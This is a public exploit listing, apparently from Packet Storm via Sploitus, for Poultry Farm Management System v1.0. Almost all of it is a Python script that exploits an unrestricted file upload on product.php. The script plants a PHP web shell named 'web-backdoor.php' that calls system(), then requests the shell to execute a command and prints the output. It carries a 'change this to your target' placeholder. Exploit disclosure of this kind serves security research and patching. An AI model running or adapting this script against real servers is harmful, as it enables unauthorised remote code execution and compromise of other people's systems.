Share
## https://sploitus.com/exploit?id=PACKETSTORM:179206
# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)  
# Date: 24-06-2024  
# CVE: N/A (Awaiting ID to be assigned)  
# Exploit Author: Jerry Thomas (w3bn00b3r)  
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip  
# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/  
# Category: Web Application  
# Version: 1.0  
# Tested on: Windows 10 | Xampp v3.3.0  
# Vulnerable endpoint: http://localhost/farm/product.php  
  
import requests  
from colorama import Fore, Style, init  
  
# Initialize colorama  
init(autoreset=True)  
  
def upload_backdoor(target):  
upload_url = f"{target}/farm/product.php"  
shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"  
  
# Prepare the payload  
payload = {  
'category': 'CHICKEN',  
'product': 'rce',  
'price': '100',  
'save': ''  
}  
  
# PHP code to be uploaded  
command = "hostname"  
data = f"<?php system('{command}');?>"  
  
# Prepare the file data  
files = {  
'productimage': ('web-backdoor.php', data, 'application/x-php')  
}  
  
try:  
print("Sending POST request to:", upload_url)  
response = requests.post(upload_url, files=files, data=payload,  
verify=False)  
  
if response.status_code == 200:  
print("\nResponse status code:", response.status_code)  
print(f"Shell has been uploaded successfully: {shell_url}")  
  
# Make a GET request to the shell URL to execute the command  
shell_response = requests.get(shell_url, verify=False)  
print("Command output:", Fore.GREEN +  
shell_response.text.strip())  
else:  
print(f"Failed to upload shell. Status code:  
{response.status_code}")  
print("Response content:", response.text)  
except requests.RequestException as e:  
print(f"An error occurred: {e}")  
  
if __name__ == "__main__":  
target = "http://localhost" # Change this to your target  
upload_backdoor(target)